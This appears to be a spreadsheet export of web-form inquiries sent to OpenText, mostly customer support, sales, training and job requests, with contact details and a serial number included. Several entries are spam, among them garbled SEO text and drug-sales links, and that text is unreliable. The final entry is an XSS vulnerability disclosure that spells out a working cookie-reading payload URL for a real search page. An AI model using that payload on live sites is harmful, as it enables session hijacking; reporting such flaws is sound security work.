    <t>Dear Sirs_x000D_
we are affected by the change of GXS OFTP2 certificate from Verisign to Comodo. We need to install manually in our system for March,11. Where is the location for download all the chain?_x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
David Molinas</t>
  </si>
  <si>
    <t xml:space="preserve">Online library solution for the NNR library </t>
  </si>
  <si>
    <t>Good morning, my login password is not accepted. I asked for the password to be sent by e-mail, but it did not arrive. So I can not download my Brava! Desktop CXL 16.3._x000D_
ID: 80668D1DD800461FA0BA20423126E8F9</t>
  </si>
  <si>
    <t>We would like to invite OpenText to recruit students from Vemana Institute of Technology</t>
  </si>
  <si>
    <t>Dear colleague,_x000D_
 _x000D_
I happened to come across your website, thought you maybe want to work with native Asian linguists for your projects, it’s _x000D_
_x000D_
why I’m reaching out to you._x000D_
 _x000D_
As a professional translation and localization company in China, with 15 years’ experience for Asian languages, 50+ in-house _x000D_
_x000D_
translators and engineers in our offices, we have worked for local business company up to market leaders such as APPLE, _x000D_
_x000D_
NVIDIA, AUTODESK, GE, SIEMENS, and SAMSUNG._x000D_
_x000D_
We own and work with all the CAT tools, DTP programs and formats available on the market: Trados 2007 &amp; Studio, SDLX, _x000D_
_x000D_
Transit, Wordfast Pro, Passolo, Swordfish, Across, Alchemy Catalyst &amp; Publisher, Distiller, XBench, Adobe CS, FrameMaker, _x000D_
_x000D_
AutoCAD, and many more. Besides our general services, we also offer tailored training, assessment &amp; support for Trados and _x000D_
_x000D_
other CAT tools._x000D_
_x000D_
With freelance rate and agency service, we might be able to work with you as a reliable partner or just another resource _x000D_
_x000D_
pool for your reference, would it make sense for us to discuss?_x000D_
_x000D_
Currently our advantageous language pairs include English to Chinese, English to Japanese, Germany to Chinese, French to _x000D_
_x000D_
Chinese, Germany to Japanese, Germany to Thai, Germany to Korean, any other languages available. All native speakers! _x000D_
_x000D_
Please assign to me at cara.tang@ccjk.com.</t>
  </si>
  <si>
    <t>cocoa the extra estrogen_x000D_
_x000D_
pinto and black beans are enjoyed practically and are also considered a priority as low-budget proteins company. coffee beans plus feature regarding other things that get them to a fundamental portion of balanced and healthy diet. herbal estrogens discovered in pinto beans are increasingly being examined as a result of many experts in order to that helps but also actually possible threats. typically steroid testosterone specific to human being beings as well as,while wildlife. its certainly motivation is to modify reproductive system pays out and consequence growth and development. when both males and females fabricate oestrogen, It is more abundant and as well as important in although. an investigation from the Tulane university or college explains that do levels of estrogen rise although age of puberty, you must contrast during the entire month while using the period. amounts fall off support a menopause. mothers may also use the extra estrogen exchanging therapy to ease a menopause [url=https://www.slideshare.net/Asiame/is-asiame-real-find-the-fairminded-asiame-review-here]Asiame review[/url] difficulties; but the truth is, excessively estrogen is linked to cancer._x000D_
_x000D_
how to define shrub s_x000D_
_x000D_
while it's true the extra estrogen ultimately occur in man and also pests, put estrogens are merely in [url=http://asiamescam.over-blog.com/]ASIAME.com[/url] food products. beans, grain and as a result plant seeds more or less all involving herbal estrogens, often known as phytoestrogens, which were nearly the same as excess estrogen. Cornell school clearly show a at decreased level of dosage amounts, plant excess estrogens play much like. sadly over extra tall amounts, Phytooestrogens most likely will neutralize or perhaps a cover their own sweet spot inside a blood vessels. They may change cellular matrix connections paths also rationale alterations in cell multiplication. clinical tests continue baffled by whether this will work in your favor t</t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
Visitor Come For Facebook Just Put URL And Clicks Button_x000D_
Traffic Will Come From USA and Western Europe_x000D_
The Traffic Will Run 24/7-365 System!_x000D_
_x000D_
http://createsplashpages.com/splash.php?id=750</t>
  </si>
  <si>
    <t>IAG is planning to upgrade Windows 2008 R2 to Windows 2016, so we contacted OpenText Technical Support team (ticket# 3410798 and JIRA ticket# IDMCLI-935) to understand whether current version of IDM is compatible with Windows 2016 or not._x000D_
It's been confirmed by OpenText Technical Support team that current version of IDM is not compatible with Windows 2016 and team has advised to contact OpenText Professional Service team to find out if there is any cost for IAG and what is the timline to make IDM work with Windows 2016. _x000D_
_x000D_
FYI - We are currently using the IDM client version is 20.1.100 and IDM server version is 20.1.60.</t>
  </si>
  <si>
    <t>I WANT TO CANCEL MY ACCOUNT.  I NO LONGER HAVE BANK ACCT,   THANK YOU!</t>
  </si>
  <si>
    <t>Hello, I'm contacting you in reference to inv#1802765133.  Please update our bill to address to our new location at 4550 Montgomery Ave Suite 1100N, Bethesda, MD 20814.  Please feel free to contact me if you have any further questions._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Carisa Martin_x000D_
Sr. AP Specialist</t>
  </si>
  <si>
    <t>Hello. We are looking to get logged into our account but it has been quite some time since we last logged in. can you please advise the email accounts used for the following OpenText accounts? EL99-1361356_x000D_
ZI001000028872_x000D_
Or can we change the email address? Can you send a password reset to whatever you have on file for these accounts and we'd be happy to go through that?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon - _x000D_
_x000D_
My name is Alexandra Burton and I am a Project Coordinator/Business Analyst in the IT department at Portland General Electric. We are in the process of moving the entire company to Windows 10 and have some folks that use OpenText Exceed 14. I’m curious as to what versions of OpenText Exceed are compatible with Windows 10, if any, to determine whether or not a software upgrade is needed. If you are able to provide me with that information it would be greatly appreciated!_x000D_
_x000D_
_x000D_
Please let me know if you have any questions!_x000D_
_x000D_
Best,_x000D_
 _x000D_
Alexandra Burton (Client Site – PGE)_x000D_
Project Coordinator | Business Analyst_x000D_
Windows 10 Team | Personal Technology Services _x000D_
Desk: 503.464.7799 | Cell: 503.422.0177_x000D_
Portland General Electric | 121 SW Salmon St, 3WTCPL | Portland, OR 97204 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Digital workflow solution inquiry. Would like to understand what solutions you all have that take paper documents, convert them to electronic form, OCR, and enable workflow to complete tasks and enable access to data resulting from process. </t>
  </si>
  <si>
    <t>Need a renewal quote</t>
  </si>
  <si>
    <t>Need integrated connector for Sharp MFP to connect to right fax</t>
  </si>
  <si>
    <t>We are looking at Redact-IT as a server solution to apply redactions to documents in SharePoint.  The application should be able to scan docs in SharePoint for personal information and then redact the text within the document.</t>
  </si>
  <si>
    <t xml:space="preserve">BD Biosciences has an older, unsupported validated Documentum instance. We need to upgrade it. _x000D_
Has the documentum product been rolled into the Open Text offering?  Please send me an email contact first - with the phone contact in it? We are looking for a path forward. </t>
  </si>
  <si>
    <t>Looking to get some additional information about Captiva Capture Training.  From the website I think we would be interested in the following classes..._x000D_
_x000D_
3-8201 Captiva 7.6 Fundamentals and Administration_x000D_
4-8206 Captiva 7.6 Designer_x000D_
4-8207 Captiva 7.6 Developer_x000D_
_x000D_
We have teams in both Columbus Ohio and Hyderabad India that are looking for training.  We will probably be looking at training for between 10-30 resources at each site.  I saw some numbers on the website about Customer Site Courses but when I spoke to someone from the training department she had no idea what that meant.</t>
  </si>
  <si>
    <t>We are looking at setting up case management, document clearance tracking, and FOIA applications. eDocs was suggested as a possible solution.</t>
  </si>
  <si>
    <t>Looking for Job change</t>
  </si>
  <si>
    <t>Hello,  Our fax to email service is not working anymore.  The last fax we received was from February 21st, so the fax service has been down for about a week.  Our fax number is 888-587-5379.  Will you please look into this and let us know if there is anything we have to do to get this service up and working again._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Aaron Lamphear_x000D_
Deer Creek Corporate Services Inc.</t>
  </si>
  <si>
    <t>Requerimos conocer para Colombia cuales son los partners autorizados para ofrecernos soporte sobre aplicaciones OpenText._x000D_
Actualmente solo conocemos Projection Core Consulting y requerimos conocer todos los autorizados._x000D_
Muchas gracias</t>
  </si>
  <si>
    <t>hotel needs</t>
  </si>
  <si>
    <t>Good afternoon, could you tell me if you have any distributor in mexico city, please because we need to buy 5 Brava DWG Viewer</t>
  </si>
  <si>
    <t>Looking for an on premise mobile forms solution in addition to an in office solution.</t>
  </si>
  <si>
    <t>Docs Open was used at a firm a few of us worked with in years past and we are looking for solution for organization our work product documents.</t>
  </si>
  <si>
    <t>Interested in implementing e-fax solution</t>
  </si>
  <si>
    <t>We currently have SAP ERP system, and we are using OpenText._x000D_
I know very little about the installation process, but we are looking to migrate from our current RedHat 5.11 platform to either RHEL 6 or 7_x000D_
_x000D_
I am reading some old documentation that the previous Basis Team member left behind before retiring, but wanted to see where best to start.</t>
  </si>
  <si>
    <t>I am trying to get help with an issue with Ascent Standard for AppXtender 5.30.068 export connector for Kofax Capture 10.2.  According to Kofax support "The ApplicationXtender Export Connector is not a Kofax product. EMC used to be the owner of that product and OpenText is the current owner."  So I was wondering how much a support contract would be._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mike Nagel</t>
  </si>
  <si>
    <t>We recently had a computer that died and it had your Global 360 Imaging Software installed on it.  In order to install the software on another computer you have to enter a serial number and then send the resulting .dat file to "Register4W@global360.com".  After that you are supposed to be sent back a registration code that you can use to register the product.  I entered in the serial number "RNEY5-FNQ66-P1GT7-5S7CQ-91ZK2" which is the serial number that was used with the old computer.  I got a .dat file but the email that I'm supposed to send it to doesn't exist anymore.  I'm going to copy and paste the contents of the .dat file below, can anyone send me a registration code in return?_x000D_
_x000D_
Contents of the .dat file_x000D_
EpGzc6kUGfoGxPKVaCtBx9BjeNTJEB4PT4YG6Egf/oFcMoMbSt7fJKz8L4KOIThTMyJyIU7pJec+_x000D_
4QMnwUR+lnerrTnE1VN7HRI4sU+wG/IpGq0mHaWuzKfjC4f4iwbTduU54EYnkZ8GMbdtKVcH6hUH_x000D_
vVf/etT3AYOgxQQeFMmhdz1AyvFw9oCCdH1y3svs2br0w9MFAUtljDqjJEBJUdQsbLecQxoWt+28_x000D_
PeZEHzYp+bROI9SKi8wpjiV1p54FHeMWq2p8dKTAIb8Qjb4aCj9kEHvHY7llVa31jaU74rPmGaot_x000D_
/h3mV2uX1f7s+u2jayrf5y/htZ1j+9qfi+419BTom+1OJOeIMbOVZogOXfxWrNwss+Jw0uyzLQ/g_x000D_
wbLGiSQ2txAWTQoOUEdaePdqNNEbF4eh/n6/tEdPv01emT32EtvYKFfp08sTvORThbe/sOAXoPmc_x000D_
dXZ4yd/xH/BkCWXfgA9JDiJXirnFf2aCnGgmi2n00Zf0LYgVtdQJXMYI4d8DukhGIm6I0CdMlAeE_x000D_
6sJTadls7nboA1bN2IZ6BlHPJdiP8IrsnlDZ/ImPeb5BPOigAYGnKYivccQQoMWb02ScSenWUfWL_x000D_
eQWExBRhdux5ucOh2b13Tb8rNJposr1Hc3zxlFuMcmzbCNmecDW53shNeCaX6I0HavFV8xlh86WY_x000D_
IOf4bsekhKFdOfFX2AoUp/b2qZXCVsNIfUCiEiJggMU4uXoW/SreKklPZjkyhuy3HIQDg4/B6XMV_x000D_
ARGVcIKWBjwP9aciJWyf/eav3iyCk4ySMLlOt69az9vMsLFLJ6o6WOsH72C4JFmJkKCjh72BKwhc_x000D_
Sbf6Hp91Xo5qUjtZEVz9B6dAugp6eO0K9mwAQji6wVz3A8Up1YfJkyRkcjSwvz9eMJB4GWHvc0po_x000D_
G+Vt9Ax+XHA2h0xt5NZYbz9vKLp5KpROPxpbIJdwBL2a0vveCvQQwqzCKfGWcguHxaGVTS7CSpmE_x000D_
2AnaaIvkfYKwz51W2U44Q+QeER46ZWuhWikkfLinjxb18tHLg5iuZGDtVwLqflwzWmq9pA58f+cG_x000D_
AhZC4GSYPG8njMqNvoRmbGPE/8p+b3sfnwZW8LFyknSiSMbWYBvDrcZbODIku6AZayLtg8/cdVw8_x000D_
6Ekiuc5OOdYh+wdTJ2pknVAXs2SsNY5deQVeLQFVSa0YfavPUIynjc3hRth7uKbdBTbMmTE/kzRs_x000D_
Op/c9hbhbhgFoV1VXiMTG59rSlAM</t>
  </si>
  <si>
    <t>My company currently uses an older version of Teleform software (v10.9) and we are looking to gain greater efficiencies via an upgrade, so I'm seeking more information about OpenText Teleform.</t>
  </si>
  <si>
    <t>I have been registering multiple employees from the federal government agency FINTRAC this morning and could not register Danielle Chénier since it is now full. Is there a possibility to still register her for the Virtual Classroom of March 26-28.18 English 2-0120 Records Management 16.2? Her coworker Elizabeth Lessard has just been registered and wanted to attend together?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to purchase 10-15 seats of  Brava CXL. I'm getting an error on the checkout._x000D_
Thanks_x000D_
Bill Freeman_x000D_
PH: 978-512-0512_x000D_
</t>
  </si>
  <si>
    <t>We're evaluating options to our current standalone fax machines as we implement a Shoretel VOIP solution, Ricoh Managed Print Services, and a Hyland Onbase Enterprise Content Management solution._x000D_
_x000D_
I need to figure out something fairly quickly to minimize the analog phone lines we retain as we move to VOIP.</t>
  </si>
  <si>
    <t>We are a current customer and will need assistance with an upgrade.  Please call for details</t>
  </si>
  <si>
    <t xml:space="preserve">Sales Enquiry </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are in the process of reviewing the services that are currently provided in our organization at the Fax level and we need some information to help us with our budget planning._x000D_
_x000D_
We are using the RightFax Business Edition with our production (4 ports) environment._x000D_
_x000D_
Could you give us an estimate of the costs for adding these modules for our licence and include also the annual support fee for each ?_x000D_
•	Conversion PDF_x000D_
•	Exchange Web Services (EWS) Connector_x000D_
•	Synchronization Module_x000D_
_x000D_
Regards,_x000D_
Jym_x000D_
_x000D_
P.S. I sent you last week a similar request, which I still have not received a return...</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a CCM partner for a tax process improvement initiative, and would like to get to know more about your product and assess its suitability for our initiative. Would you be able to have an on-site discussion session with us in the week of March 12-16? Our office locates at Oerlikon Zurich, and we are looking for a session around 2 hours. _x000D_
We want to get to know more about those elements:_x000D_
•	Template and content management, especially any tax forms related experience_x000D_
•	Integration with 3rd party systems, incl. data integration / transformation from multiple other systems_x000D_
•	Multichannel support, i.e., output to PDF / website / API, etc._x000D_
•	Visual workflow design, and support for business changes_x000D_
•	Process for continuous development and implementation_x000D_
During the session, we want to discuss with you in more details about our ideal use cases and how your product can help us in achieving those. The expectation is that the majority of the time is spent on the interactive discussion, with the objective of validating whether your product satisfies the specific needs. Optionally it would be great to hear about your use cases in Swiss tax too (if any). Since some confidential information or strategy might be involved, we would like to have a Non-Disclosure Agreement to be signed between us at some point before the session._x000D_
Please let us know if your team is interested. _x000D_
</t>
  </si>
  <si>
    <t>Need to understand about product license for Documentum etc..</t>
  </si>
  <si>
    <t>I would like more information on Rightfax and how to set up our employees to receive fax to their emails as pdf. We will need capability for our employees on the East Coast of the U.S.</t>
  </si>
  <si>
    <t>Interest in more information about file archiving and storage options.  We need to guarantee 2 years of file retention and backups are not an affective option since people can delete files without us knowing and the backups may miss it.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Would be interested in reaching SAP Users Mailing List ?_x000D_
_x000D_
You can also reach: SAP Business One Users, SAP Analytics Users, SAP RDS Users, SAP HANA Users, SAP xApps Users, SAP 100 ERP, SAP 300 ERP, SAP 500 ERP, SAP ERP X3, SAP CRM, SAP ACT, Quick Book and other SAP Products etc… _x000D_
_x000D_
If you need any kind of list including above or any other sectors professionals. Please let me know your required “Target Criteria”. Geographic Location | Business Vertical | Job Titles. So that I can get back to you with counts and more information for your review._x000D_
_x000D_
Look forward to hear from you soon…_x000D_
</t>
  </si>
  <si>
    <t>Hi, answer to client RFP dealing with OTIC, i need the cost of OTIC development and server licence to include it in the cost estimation._x000D_
_x000D_
Thanks &amp; Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to introduce our company, and, at the same time, offer our services. CNRG Development is a young Europian company from Serbia, with a team of people that have 10+ years of experience working in a largest Serbian IT companies. With experienced team leaders, we have a lot of young programers, whose youth and energy motivate our teams to the full extent._x000D_
At this moment, we have many projects around Europe that are in final phase or succesfully completed. Large number of our programers are involved in execution of the project for Swedish Ikea._x000D_
Our tem is constantly growing, so we are forced to seek new markets. Large number of satisfied customers is the guarantee of a quality services we provide._x000D_
Please consider possibility of cooperation, especially in area of Web Development, which is our area of speciality. Also, bear in mind that we will offer you 10 hours free of charge for the first project that requires our programers to work 20+ hours.  _x000D_
Respectfully yours,_x000D_
_x000D_
Sinisa Kovic_x000D_
CEO at CNRG Development_x000D_
www.cnrgoutsource.com_x000D_
cell +381 63 762 30 14_x000D_
Skype kovic.sinisa_x000D_
</t>
  </si>
  <si>
    <t>Registration to GXS network portal.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
_x000D_
I am interested in your course: _x000D_
"3-2022 Installation and Administration of OpenText Extended ECM for SAP Solutions."_x000D_
My question is what does this mean:_x000D_
LOCATION: Virtual Classroom - Asia Pacific_x000D_
_x000D_
Kind regards,_x000D_
Günter Albrecht_x000D_
eGovernment Basisdienste New eGovernment Services_x000D_
_x000D_
Bundesrechenzentrum GmbH_x000D_
Hintere Zollamtsstraße 4, 1030 Wien_x000D_
_x000D_
Telefon: +43 1 71123 882178_x000D_
Mobil: +43 664 6113865_x000D_
E-Mail: Guenter.Albrecht@brz.gv.at_x000D_
Web: www.brz.gv.at _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>A customer need to change licensmodell</t>
  </si>
  <si>
    <t>I need an OpenText content management solution that can integrate with SAP</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Après désinstallation de l'ancienne version et installation de la nouvelle, le programme ne fonctionne pas et annonce qu'il ne peut faire la mise à jour._x000D_
Merci par avance pour votre réponse._x000D_
Cordialement _x000D_
Fabrice LEBOURG_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Spett.le Società,_x000D_
la vostra azienda risulta essere nell'elenco di fornitori partner OpenText, pertanto sono a chiedere la disponibilità di una  Vs risorsa avente le seguenti competenze:_x000D_
"Competenza sistemistiche su Opentext. E’ gradita anche competenza sistemistica su  Sharepoint 2013, da collocare su Roma/Molfetta."_x000D_
Qualora poteste soddisfare le nostre esigenze e per maggiori informazioni, vi preghiamo di contattarci prima possibile ai riferimenti posti nel form._x000D_
Distinti saluti,_x000D_
Paola Crugliano_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Currently have a Master Data transformation project under EDC (Energy development Corporation. One of the initiatives under said project is the archiving of retired materials. Found that Opentext had some presence in the Philippines and had two projects in the Philippines under it's belt. _x000D_
_x000D_
Wondering if possible to get a ballpark figure on the price of Opentext archiving solutions. We are eager to get traction on the project and would love to hear from you ASAP_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Is it possible to test the "Brava! Desktop DXP" befor i buy it?_x000D_
Greetings,_x000D_
Hubert </t>
  </si>
  <si>
    <t>We are having licensing with openText Documentum and support in place for any Production issue , I am an employee of gwclogistics and need some advice urgent Prod issue where keep getting connection lost error when we use "scanplus " captiva and D2 upload error during checkout and some files lost. Pls contact me asap or share the details on how to contact you as the person have the Product line and ID resigned already.</t>
  </si>
  <si>
    <t>I have my account for support when I was working on Archive Server, since you baught HPOD (OTOS) I need also to access OTOS patch and other information , what should I do to access this information ? Before with HPE we had a list of supported printer, I could not found this information on your web site ?  Thanks for your help , Christophe</t>
  </si>
  <si>
    <t>how two purchase license for gupta report builder</t>
  </si>
  <si>
    <t xml:space="preserve">Good day!_x000D_
I am interested in working as an intern at OpenText. Are there any available internships this year? I would gladly provide my resume and other details if needed. Thank you!_x000D_
</t>
  </si>
  <si>
    <t>Requirement of OpenText Content Server as part of Tending for new Job for MIRAGE LEISURE AND DEVELOPMENT INC.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I was wondering if you can direct me to someone in HR, preferably from the Waterloo office, to help resolve this issue. I met with an HR member from OpenText at Communitech's Tech Jam event. I received an email to complete my application by uploading my resume to this following link: https://opentextats.avature.net/DataCompletionRequest?uid=aDVLUg7JzSOU6EBk&amp;jobId=17815&amp;emailCampaignId=155. However, the link appears to be broken and tried revisiting the site at a different time as well. _x000D_
_x000D_
Please let me know the next steps._x000D_
_x000D_
Take care,_x000D_
_x000D_
Julia</t>
  </si>
  <si>
    <t>how to access</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
We are Namconson Pipeline Company in Vietnam. We are your customer with Documentum system. We are looking for potential experienced suppliers who are Open Text partners and can upgrade Documentum system well. Would you please advise us a list of your partners for this purpose? We prefer those who are in ASEAN area._x000D_
Thank you!</t>
  </si>
  <si>
    <t>Hi,_x000D_
How do i remove my old CV's on your website? _x000D_
There are 2 copies of my CV (dated 2014) and i can't delete it myself???</t>
  </si>
  <si>
    <t>Would like to get a price quote and possibly a trial copy. We already have a DMG 2000._x000D_
Brooktrout SR140 and we purchased 12 lines. We are looking into possibly switching from GFI to RightFax.</t>
  </si>
  <si>
    <t>Good morning_x000D_
I would like to know whether FreeWare for Brava DWG View is available free of charge on the web. Reply to the mail</t>
  </si>
  <si>
    <t>These numbers keep calling my service department direct lines causing business disruptions. Please remove or put these telephone numbers on the do not call list (708)956-7701 and (708)956-7715. Thank you</t>
  </si>
  <si>
    <t>Please send invoice for payment of $75.00 from February 24, 2018 for following fax number 866 672 9553, JustNeem, LLC._x000D_
I am also unable to send faxes at this time. I have been in email contact with your customer service, but we have not found a solution. Please advise._x000D_
_x000D_
Magda Radtke</t>
  </si>
  <si>
    <t xml:space="preserve">We receive email itineraries from xpedite/open text which are obliterated partially by what appears to be a linked in logo.  Why?  Not all have it.  We don't have linked in and it is not on the computer either.  </t>
  </si>
  <si>
    <t>Evaluating a cloud fax/fax server solution to replace our existing fax machines as part of our VOIP implementation.  We are also implementing Hyland Onbase for our ECM, have a managed print services contract with Ricoh, and are migrating our faculty/staff from Exchange to O365.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, we are in the process of connecting with various companies to demo their products and provide us with details of what is offered.  We are starting up a document management project and would like to understand your product and if it meets the requirements of Dream._x000D_
</t>
  </si>
  <si>
    <t>Prezados,_x000D_
_x000D_
A algum tempo não consigo acessar a área do My Support com o meu usuário. Gentileza informar o que houve.</t>
  </si>
  <si>
    <t>Hello, I need to create new IGKey.lic  for Brava! desktop 7.2. But we dont have any account here. Our costumer ID is: 122231</t>
  </si>
  <si>
    <t xml:space="preserve">Онкопрепараты У нас вы всегда сможете получить качественные препараты от производителей по низкой цене  _x000D_
 _x000D_
&lt;a href=http://anticancer24.ru/shop/170/desc/xolair&gt;ксолар (omalizumab) - xolair (омализумаб)&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=http://anticancer24.ru/shop/72/desc/kupit-zecyte-abirateron-acetat-zecit-abiraterone-acetate-analog-zytiga]купить zecyte абиратерон ацетат - зецит abiraterone acetate - аналог zytiga[/url]_x000D_
</t>
  </si>
  <si>
    <t>set up</t>
  </si>
  <si>
    <t>Hydroone ticket for copying Open Text Records Management Classifications from Prod to Dev</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I work in the finance department at Novo Nordisk, and I trying to get in contact with a member of your Finance team.  We are mailing 2017 1099 tax forms to our business partners, and it appears that I have an outdated mailing address in the system for your company.  Could you please connect me with someone who could tell me where you would like this tax form sent?_x000D_
_x000D_
Thank you,_x000D_
Ken</t>
  </si>
  <si>
    <t>To gain a better understanding of your OpenText Fax2Mail solution.</t>
  </si>
  <si>
    <t>I would like to request a trial copy of NFS Client. The form on the landing page does not submit.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
My name is Larry McDonnell. I am with the West Virginia Office of Technology’s procurement team. I am doing MARKET RESEARCH to see if you have a product that can provide mainframe archival and management of records along with an easy to use interface. The mainframe archival and management of records must be capable of the following: _x000D_
•	The mainframe uses Z/os Enterprise Server. _x000D_
•	The software will be used for archiving and management of records, printing, distributing, and storing large printouts of financial reports. _x000D_
•	Reports will need to have an easy to use interface for searching, accessing content, and be viewed through 3270 emulator and PC interface. _x000D_
•	Will need to provide restricted access to reports and limit access to specific areas of the reports that are automatically distributed. _x000D_
•	Software allows customizable access by 2 character login ID prefix and allow admins to add/remove users. _x000D_
•	The reports must be capable of being archived as offline storage for an extended period of time and be recalled when needed. _x000D_
                 o	Multi-level security for financial reports accessed from the product and from outside the product with the Z/OS operating system. _x000D_
                 o	Multi-level security allowing the product to archive reports be encrypted without the use of a third party software and stored on offline tape volumes.  _x000D_
•	Archive reports must have the option to expire based on the following parameters:  _x000D_
                 o	Age_x000D_
                 o	By event_x000D_
                 o	By generation _x000D_
                 o	By the user_x000D_
                 o	Or by the value specified in migration class_x000D_
•	Multiple disparate reports archived on a single volume defined by a migration class as well  _x000D_
•	Sweep and archive reports from various areas of the mainframe, both automatically and manually. _x000D_
                  o	The areas include but are not limited to: _x000D_
                        -	DASD _x000D_
                        -	Tape_x000D_
                   </t>
  </si>
  <si>
    <t>Need a contact at OpenText to send consent reqeust - we have a change of control event, which requires the consent of OpenText per our PixTools Channel Partner Agreement that was assigned to OpenText from EMC.</t>
  </si>
  <si>
    <t>Need to connect with Teleform support team- we can no longer launch Teleform. How do we contact them these days? Please help.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry on pricing of licensing for Analytics Designer, iHub and Analytics Studio </t>
  </si>
  <si>
    <t>RoundTower is a Solutions Provider/VAR, Looking for information on partnership, etc.  We have a client that is looking to move their on-prem RightFax to a cloud solution and I'm not familiar with the cloud solution.  Need some information on capabilities/caveats to cloud vs on-prem when it comes to back-end integrations, etc.  My apologies if you received this multiple times, my other browser was throwing errors after submitting.</t>
  </si>
  <si>
    <t>Job Posting on your website</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry training: Hi, I have been told that OT has an unlimited training program for $5000 which entitles a subscriber to follow has many online training programs as possible._x000D_
Could you please point me in the right direction to obtain further information?_x000D_
</t>
  </si>
  <si>
    <t>Do you have Training courses for OpenText™ Output Management? _x000D_
Online, Ondemand, CD and Web-based courses? _x000D_
_x000D_
Formerly Dazel (HP Output Management) _x000D_
_x000D_
OpenText™ Output Management is a family of integrated software products that ensure reliable delivery of print jobs to output resources in both distributed and non-distributed environments—everything from printers and fax destinations to e-mail and Web destinations._x000D_
_x000D_
These products support the automated creation and delivery of business process documents, and delivery of end-user print jobs. With OpenText Output Management, you can centrally manage delivery processes and eliminate the  limitations of point solutions that only provide a solution for a single requirement or address the needs of a single user._x000D_
_x000D_
OpenText Output Management can save your company time and money by ensuring the smooth flow of information within and beyond the boundaries of your enterprise. Output Management products provide support for legacy investments while also enabling new, future technology.</t>
  </si>
  <si>
    <t>Company is looking for a document management solution and I want to speak to someone about the Documentum product.  We are looking to make a decision very quickly.</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
If maintenance is not renewed on Livelink can we continue to use Livelink?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Can you share the licencing terms for FTS Enterprise Gateway Explorer please?</t>
  </si>
  <si>
    <t>HI, we are planning to deploy open text archive server in our landscape to server as a backend for SAP application documents, i would like to gain access to the installation documents for open text archive 16.2 .url "https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&amp;objId=62383071&amp;objAction=browse&amp;viewType=1." from the sap note 2274872._x000D_
_x000D_
Regards,_x000D_
Rajamani</t>
  </si>
  <si>
    <t>Product questions.</t>
  </si>
  <si>
    <t>costo de la plataforma FirstClass</t>
  </si>
  <si>
    <t>Looking into replacement of Faxpress, either cloud or hardware</t>
  </si>
  <si>
    <t>Request for quote for Exceed Licenses Maintenance Renewal qty 147.</t>
  </si>
  <si>
    <t>I have received an invitation to acces documents from a customer. I was told I had to  create an account for our company and still don't have access to the documents.  How do I need to proceed?</t>
  </si>
  <si>
    <t>We would like to get a quote for EDI/VAN.  We need a middle point between our file server and our carriers(verizon, ATT and Sprint)._x000D_
Estimated around 40 files around 5 mb each month._x000D_
_x000D_
Thanks,_x000D_
Chuck</t>
  </si>
  <si>
    <t>Would like to see demo of information governance products.  Please contact me.</t>
  </si>
  <si>
    <t>Again, we are contacting your consulting/professional services.  We need help doing a Proof of Concept on your NFS Solo client with AWS EFS. _x000D_
_x000D_
Please respond, even it you can't help.  Perhaps you can point us to an organization that we could contract with to help on this._x000D_
_x000D_
Regards,_x000D_
_x000D_
Blake Borup</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
At the moment our company uses Hyland to handle our Enterprise Content Management. In general we are quite happy to use Hyland, however as our company has a current focus for a new ERP Platform (SAP) we are also investigating the possibility of moving towards a new ECM platform.  With the 2015 Gartner Report naming Open Text a leader in ECM, of course OpenText has also been mentioned several times in our company. _x000D_
_x000D_
I noticed your Innovation Tour 2018 also visits Amsterdam on April 18th. Based on the announcement and program I would be very interested to join this day in Amsterdam and see if it can help me to understand the differences between Open Text and our current Hyland platform. I’m especially interested in the integration with SAP which is offered by OpenText. However from your website it was not quite clear to me whether or not the Innovation Tour 2018 is also open for potential new customers, or is this tour only meant for existing customers and partners?_x000D_
_x000D_
Also it is not exactly clear to me if potential new customers will need to pay the €500,- fee for the event pass to join this event? _x000D_
_x000D_
Can I please ask you to advise me on this? Thanks for your reply and hopefully we will meet in Amsterdam on April 18th._x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Jasper Peeters,_x000D_
_x000D_
Sligro Food Group Netherlands B.V._x000D_
Functional Application Support_x000D_
</t>
  </si>
  <si>
    <t>Dear Team._x000D_
I've tried to download Trial version of Gupta Team Developer 7.0 via request form._x000D_
Unfortunately, didn't received any details from your side._x000D_
Please, kindly assist to download trial version._x000D_
_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>Hello_x000D_
I'm Security Researcher I have Found A high Vulnerability In your Site Named Cross-site-cripting (XSS) ._x000D_
Vulnerability In Search Your Website_x000D_
The vulnerable Link= http://otc.saas.nstein.net/opentext-en/search/?q="&gt;&lt;svg/onload=alert(document.cookie)&gt;+"onmouseover="alert(7);+"o_x000D_
for More Informatio, About vulnerability :https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)_x000D_
My Name= Mehdi Mrh_x000D_
And Thank</t>
  </si>
  <si>
